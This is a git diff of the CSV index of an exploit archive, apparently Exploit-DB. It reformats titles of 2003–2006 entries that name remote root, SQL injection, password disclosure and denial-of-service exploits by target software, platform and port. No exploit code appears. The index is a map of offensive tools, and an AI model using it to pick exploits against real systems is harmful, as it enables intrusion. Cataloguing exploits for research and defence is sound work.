diff --git a/files.csv b/files.csv index ed21f84c6..c35cec951 100755 --- a/files.csv +++ b/files.csv @@ -28,7 +28,7 @@ id,file,description,date,author,platform,type,port 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 Remote Code Execution Exploit",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit",2003-05-12,bob,bsd,local,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 Remote Command Execution Exploit",2003-05-12,n/a,windows,remote,0 -31,platforms/linux/local/31.pl,"CdRecord Version <= 2.0 Mandrake local root exploit",2003-05-14,n/a,linux,local,0 +31,platforms/linux/local/31.pl,"CdRecord Version <= 2.0 - Mandrake local root exploit",2003-05-14,n/a,linux,local,0 32,platforms/windows/local/32.c,"MS Windows XP (explorer.exe) Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,n/a,linux,remote,80 @@ -88,7 +88,7 @@ id,file,description,date,author,platform,type,port 90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"RĂ©mi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel <= 3.24, 4.00 Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 -93,platforms/linux/local/93.c,"RealPlayer 9 *nix Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 +93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 DoS",2003-09-08,badpack3t,multiple,dos,80 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 @@ -118,20 +118,20 @@ id,file,description,date,author,platform,type,port 121,platforms/windows/remote/121.c,"MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 123,platforms/windows/remote/123.c,"MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 -124,platforms/windows/remote/124.pl,"IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 +124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll version 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 ""do_brk()"" local Root Exploit (PoC)",2003-12-02,"Christophe Devine",linux,local,0 130,platforms/windows/remote/130.c,"MS Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working)",2003-12-05,"Wojciech Purczynski",linux,local,0 -132,platforms/linux/remote/132.c,"Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 +132,platforms/linux/remote/132.c,"Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 135,platforms/windows/remote/135.c,"MS Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 -138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit",2003-12-21,RusH,php,webapps,0 +138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 - 'cid' sql injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0 @@ -284,7 +284,7 @@ id,file,description,date,author,platform,type,port 301,platforms/solaris/remote/301.c,"CVS Remote Entry Line Root Heap Overflow Exploit",2004-06-25,n/a,solaris,remote,2401 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit",2004-06-25,n/a,unix,local,0 303,platforms/linux/remote/303.pl,"Borland Interbase <= 7.x Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 -304,platforms/linux/remote/304.c,"Subversion 1.0.2 svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 +304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x-2.6.x Assembler Inline Function Local DoS Exploit",2004-06-25,lorenzo,linux,dos,0 307,platforms/linux/remote/307.py,"rlpr <= 2.04 msg() Remote Format String Exploit",2004-06-25,jaguar,linux,remote,7290 308,platforms/linux/remote/308.c,"MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit",2004-07-04,c0ntex,linux,remote,0 @@ -365,7 +365,7 @@ id,file,description,date,author,platform,type,port 391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,n/a,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vuln - ftpdctl",2004-08-13,pi3,linux,local,0 +394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM ""Away"" Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143 @@ -428,7 +428,7 @@ id,file,description,date,author,platform,type,port 556,platforms/windows/remote/556.c,"MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 558,platforms/windows/local/558.c,"WinRAR 1.0 Local Buffer Overflow Exploit",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf 2.2.1 Local Buffer Overflow Exploit",2004-09-28,Delikon,windows,local,0 -560,platforms/windows/local/560.txt,"GlobalSCAPE - CuteFTP macros (*.mcr) Local Vulnerability",2004-09-28,ATmaCA,windows,local,0 +560,platforms/windows/local/560.txt,"GlobalSCAPE - CuteFTP macros (.mcr) - Local Vulnerability",2004-09-28,ATmaCA,windows,local,0 561,platforms/php/webapps/561.sh,"Serendipity 0.7-beta1 SQL Injection Proof of Concept",2004-09-28,aCiDBiTS,php,webapps,0 562,platforms/windows/dos/562.c,"MSSQL 7.0 Remote Denial of Service Exploit",2004-09-29,"securma massine",windows,dos,0 565,platforms/php/webapps/565.txt,"Silent Storm Portal Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 @@ -469,7 +469,7 @@ id,file,description,date,author,platform,type,port 607,platforms/windows/dos/607.c,"Flash Messaging <= 5.2.0g Remote Denial of Service Exploit",2004-03-02,"Luigi Auriemma",windows,dos,0 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 Remote Root Heap Overflow Exploit",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0 -611,platforms/windows/dos/611.c,"Chesapeake TFTP Server 1.0 Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 +611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and dos poc exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 612,platforms/windows/remote/612.html,"MS Internet Explorer (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,SkyLined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 @@ -483,7 +483,7 @@ id,file,description,date,author,platform,type,port 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 628,platforms/windows/dos/628.c,"NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 629,platforms/multiple/local/629.c,"Multiple AntiVirus (zip file) Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 -630,platforms/php/webapps/630.pl,"UBB.threads 6.2.*-6.3.* one char bruteforce exploit",2004-11-15,RusH,php,webapps,0 +630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x - 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,n/a,php,webapps,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 635,platforms/php/webapps/635.txt,"miniBB Input Validation Hole in 'user' Parameter",2004-11-16,n/a,php,webapps,0 @@ -523,9 +523,9 @@ id,file,description,date,author,platform,type,port 673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller <= 0.6.1 Hotfix 1.4 Directory Browsing Vulnerability",2004-12-05,Mouse,windows,remote,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 -677,platforms/windows/dos/677.txt,"GetRight <= 5.2a Skin File (*.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 +677,platforms/windows/dos/677.txt,"GetRight <= 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 + Vietnam <= 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 -680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue Local Root Exploit",2004-12-08,"Jonathan Bringhurst",osx,local,0 +680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue - Local Root Exploit",2004-12-08,"Jonathan Bringhurst",osx,local,0 681,platforms/linux/remote/681.c,"Citadel/UX <= 6.27 Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 @@ -534,10 +534,10 @@ id,file,description,date,author,platform,type,port 686,platforms/linux/dos/686.c,"Linux Kernel (<= 2.6.9, 2.4.22-28) (igmp.c) Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit",2004-12-15,x90c,hardware,dos,0 -689,platforms/multiple/remote/689.pl,"wget <= 1.9 Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 -690,platforms/linux/dos/690.c,"Linux Kernel <= 2.6.9, <= 2.4.28 vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 -691,platforms/linux/dos/691.c,"Linux Kernel <= 2.6.9, <= 2.4.28 Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 -692,platforms/linux/dos/692.c,"Linux Kernel <= 2.6.9, <= 2.4.28 ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 +689,platforms/multiple/remote/689.pl,"wget <= 1.9 - Directory Traversal exploit",2004-12-15,jjminar,multiple,remote,0 +690,platforms/linux/dos/690.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 +691,platforms/linux/dos/691.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 +692,platforms/linux/dos/692.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 693,platforms/windows/remote/693.c,"Ability Server <= 2.34 Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21 694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope <= 15.5 Symlink Vulnerability Exploit",2004-12-17,Gangstuck,linux,local,0 @@ -618,7 +618,7 @@ id,file,description,date,author,platform,type,port 792,platforms/linux/local/792.c,"Setuid perl PerlIO_Debug() root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 793,platforms/osx/local/793.pl,"Mac OS X DS_Store Arbitrary File Overwrite Exploit",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 -795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue Local Root Exploit",2005-02-07,0xdeadbabe,osx,local,0 +795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim <= 4.42 Local Root Exploit",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 @@ -660,7 +660,7 @@ id,file,description,date,author,platform,type,port 835,platforms/windows/local/835.c,"SendLink 1.5 Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 837,platforms/windows/local/837.c,"Chat Anywhere 2.72a Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 -838,platforms/multiple/dos/838.pl,"WebConnect 6.4.4 - 6.5 Directory Traversal and Denial of Service Exploit",2005-02-24,Karak0rsan,multiple,dos,0 +838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 - 6.5 - Directory Traversal and denial of service exploit",2005-02-24,Karak0rsan,multiple,dos,0 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 - 6.2 Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 ""cl_guid"" - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 @@ -720,7 +720,7 @@ id,file,description,date,author,platform,type,port 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25 -901,platforms/php/webapps/901.pl,"PunBB version <= 1.2.2 Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 +901,platforms/php/webapps/901.pl,"PunBB version <= 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 902,platforms/linux/remote/902.c,"mtftpd <= 0.0.3 Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 904,platforms/linux/dos/904.c,"Linux Kernel <= 2.6.10 Local Denial of Service Exploit",2005-03-29,ChoiX,linux,dos,0 @@ -740,7 +740,7 @@ id,file,description,date,author,platform,type,port 919,platforms/windows/local/919.c,"FireFly 1.0 Local Proxy Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)",2005-04-07,"Fabrizi Andrea",php,webapps,0 -922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 - Remote Command Execution (version 1)",2005-04-08,GreenwooD,cgi,webapps,0 +922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 - Remote Command Execution (1)",2005-04-08,GreenwooD,cgi,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash <= 3.7 Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 @@ -811,10 +811,10 @@ id,file,description,date,author,platform,type,port 998,platforms/linux/dos/998.c,"Linux Kernel <= 2.6.12-rc4 (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0 999,platforms/linux/dos/999.c,"Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 1000,platforms/windows/dos/1000.cpp,"MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 -1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit (Instructions w/ Exploit)",2005-05-19,watercloud,aix,local,0 +1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 -1004,platforms/cgi/webapps/1004.php,"WebAPP v0.9.9.2.1 Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 -1005,platforms/cgi/webapps/1005.pl,"WebAPP v0.9.9.2.1 Remote Command Execution Exploit (1st)",2005-05-20,Alpha_Programmer,cgi,webapps,0 +1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 +1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0 @@ -962,7 +962,7 @@ id,file,description,date,author,platform,type,port 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 -1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition Version <= 5.2.2 DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 +1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition Version <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 @@ -982,8 +982,8 @@ id,file,description,date,author,platform,type,port 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 Remote Buffer Overflow Exploit",2005-08-30,basher13,windows,remote,80 -1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 -1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 +1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 +1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 - (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 1187,platforms/linux/local/1187.c,"Gopher <= 3.0.9 (+VIEWS) Remote (Client Side) Buffer Overflow Exploit",2005-08-30,vade79,linux,local,0 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager <= 7.50 Remote Exploit",2005-08-30,Lympex,multiple,remote,0 1189,platforms/php/webapps/1189.c,"vBulletin <= 3.0.8 Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 @@ -1096,7 +1096,7 @@ id,file,description,date,author,platform,type,port 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit",2005-11-12,rgod,php,webapps,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit",2005-11-12,"Kevin Finisterre",linux,local,0 1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery <= 1.3.2 File Retrieval SQL Injection Exploit",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 -1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 Blind SQL Injection Exploit",2005-11-14,rgod,php,webapps,0 +1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection Exploit",2005-11-14,rgod,php,webapps,0 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 (catid) Remote SQL Injection Vulnerabilities",2005-11-14,Devil-00,php,webapps,0 1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 (show.php id) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 (TopicID) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 @@ -1255,7 +1255,7 @@ id,file,description,date,author,platform,type,port 1512,platforms/php/webapps/1512.pl,"Admbook <= 1.2.2 (X-Forwarded-For) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP <= 0.2.9.9 (tid) Remote SQL Injection Exploit",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0 -1515,platforms/php/webapps/1515.pl,"GeekLog 1.* (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 +1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0 @@ -1278,7 +1278,7 @@ id,file,description,date,author,platform,type,port 1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 1536,platforms/windows/remote/1536.pm,"MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334 -1538,platforms/php/webapps/1538.pl,"FarsiNews <= 2.5 Directory Traversal Arbitrary (users.db) Access Exploit",2006-02-28,Hessam-x,php,webapps,0 +1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 @@ -1326,7 +1326,7 @@ id,file,description,date,author,platform,type,port 1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 1586,platforms/php/webapps/1586.php,"php iCalendar <= 2.21 (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0 -1588,platforms/php/webapps/1588.php,"Nodez <= 4.6.1.1 Mercury Multiple Remote Vulnerabilities",2006-03-18,rgod,php,webapps,0 +1588,platforms/php/webapps/1588.php,"nodez <= 4.6.1.1 mercury Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog <= 6.0 (fldGalleryID) Remote SQL Injection Exploit",2006-03-18,nukedx,asp,webapps,0 1590,platforms/php/webapps/1590.pl,"ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution 